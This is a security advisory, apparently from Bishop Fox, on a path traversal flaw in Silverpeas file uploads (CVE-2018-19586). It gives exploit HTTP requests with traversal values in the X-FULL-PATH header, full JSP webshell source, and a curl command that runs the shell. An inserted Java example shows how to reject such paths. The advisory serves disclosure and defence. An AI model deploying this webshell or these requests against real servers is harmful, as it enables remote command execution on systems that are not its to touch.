Silverpeas 5.15 To 6.0.2: Path Traversal

by Bastien Faure, on Jan 15, 2019 1:09:16 PM

Product Description

From the vendor’s website:

“Silverpeas is an open source WEB platform that improves the collaboration between the actors of a company or organization.” Silverpeas is widely used by many notable French organizations including those in the media, retail, and government space. 

Vulnerabilities List

One vulnerability was identified within the Silverpeas 5.15 to 6.0.2 application. 

Affected Versions

5.15 to 6.0.2

Solution

If you are using the affected versions of the Silverpeas software, please ensure you have the following mitigations installed:


Path Traversal

Silverpeas 5.15 to 6.0.2 is affected by an authenticated path traversal vulnerability that can be triggered during file uploads. This vulnerability enables regular users to write arbitrary files on the underlying system with the privileges of the user running the application. An attacker may leverage the vulnerability to write an executable JSP file in an exposed web directory and execute commands on the underlying system.

Vulnerability Details

CVE ID: CVE-2018-19586

Access Vector: Remote 

Security Risk: Critical 

Vulnerability: CWE-23

CVSS Base Score: 9.9

CVSS vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

The path traversal vulnerability is located in an upload mechanism that is reachable from several other features (e.g., forum, ideas) with regular user privileges. The application takes the destination path of the upload from the X-FULL-PATH HTTP request header without sanitizing it:

POST /silverpeas/services/fileUpload HTTP/1.1
Host: vulns.lan:8000
…omitted for brevity…
Content-Type: application/octet-stream
X-FULL-PATH: ../../../../../../../tmp/test.png

FILE CONTENTS

The file is then created in /tmp:

root@vulns:/tmp# ls -lah | grep -i test
-rw-r--r-- 1 root root 201 nov. 16 02:53 test.png

By default, files are uploaded to $SILVERPEAS_HOME/data/temp/[UUID]/, which is outside the application’s main directory. When the official Silverpeas installer is used, the core package (containing the main Java classes and JSP files) is deployed in a virtual file system (VFS) whose path is randomized and not writable. However, the installer ships another web application archive (WAR) that is reachable under /weblib/ and whose path is not randomized.
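As an added illustration (not Silverpeas code, and not the vendor's actual patch), the following Java check shows how an upload handler can confine a client-supplied X-FULL-PATH value to the per-upload temporary directory: the header is resolved against the base directory, normalized, and rejected unless the result still lies inside that directory. The base directory and the header values in main() are constructed for the example.

```java
import java.nio.file.Path;
import java.nio.file.Paths;

// Added example: confines a client-supplied X-FULL-PATH value to the
// per-upload temp directory ($SILVERPEAS_HOME/data/temp/[UUID]/).
// Illustrative code only, not the Silverpeas project's own fix.
public final class UploadPathCheck {

    private UploadPathCheck() {}

    /**
     * Returns the absolute destination for the upload, or throws if the
     * header value would place the file anywhere outside uploadDir.
     */
    public static Path resolveInside(Path uploadDir, String fullPathHeader) {
        if (fullPathHeader == null || fullPathHeader.isEmpty()) {
            throw new IllegalArgumentException("missing X-FULL-PATH");
        }
        Path base = uploadDir.toAbsolutePath().normalize();
        // resolve() returns an absolute argument unchanged, so "/tmp/x" is
        // caught by the containment check just like "../../tmp/x".
        // A NUL byte in the header makes resolve() throw InvalidPathException,
        // which is an IllegalArgumentException and is rejected the same way.
        Path candidate = base.resolve(fullPathHeader).normalize();
        // Path.startsWith compares whole name elements, so a sibling such as
        // /data/temp-evil is not mistaken for a child of /data/temp.
        if (candidate.equals(base) || !candidate.startsWith(base)) {
            throw new IllegalArgumentException(
                "X-FULL-PATH escapes the upload directory: " + fullPathHeader);
        }
        return candidate;
    }

    // Constructed sample values: a base directory and header values shaped
    // like the requests shown in this advisory.
    public static void main(String[] args) {
        Path uploadDir = Paths.get("/opt/silverpeas/data/temp/0f3c1a2b-example-uuid");
        String[] headers = {
            "report.png",
            "images/logo.png",
            "../../../../../../../tmp/test.png",
            "../../web/weblib.war/Aurora/css/webshell.jsp",
            "/tmp/test.png"
        };
        for (String h : headers) {
            try {
                System.out.println("ACCEPT " + h + " -> " + resolveInside(uploadDir, h));
            } catch (IllegalArgumentException e) {
                System.out.println("REJECT " + e.getMessage());
            }
        }
    }
}
```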

The request below can be used to deploy a malicious JSP file:

POST /silverpeas/services/fileUpload HTTP/1.1
Host: vulns.lan:8000
…omitted for brevity…
Content-Type: application/octet-stream
X-FULL-PATH: ../../web/weblib.war/Aurora/css/webshell.jsp
…omitted for brevity…

<%@ page import="java.io.*" %>
<%
    String cmd = request.getParameter("cmd");
    String output = "";
    if (cmd != null) {
        String s = null;
        try {
            Process p = Runtime.getRuntime().exec(cmd, null, null);
            BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
            while ((s = sI.readLine()) != null) { output += s + "\n"; }
        } catch (IOException e) { e.printStackTrace(); }
    }
%>
<%=output %>

Command execution can then be achieved through the deployed file, as shown below:

$ curl 'http://vulns.lan:8000/weblib/Aurora/css/webshell.jsp?cmd=ls'

appclient
bin
copyright.txt
docs
domain
jboss-modules.jar
LICENSE.txt
modules
README.txt
standalone
welcome-content

The issue is due to a lack of user-input sanitization in the FileUploadData Java class. For more information, see:

Disclosure Timeline: 

  • 11/10/2018: Initial discovery for version 6.0.2
  • 11/26/2018: Initial notification of product vendor
  • 12/01/2018: Versions 5.15 to 6.0.2 discovered to be affected
  • 12/14/2018: Patches released for 5.15 and 6.0 

Researcher:

Bastien Faure, Security Associate at Bishop Fox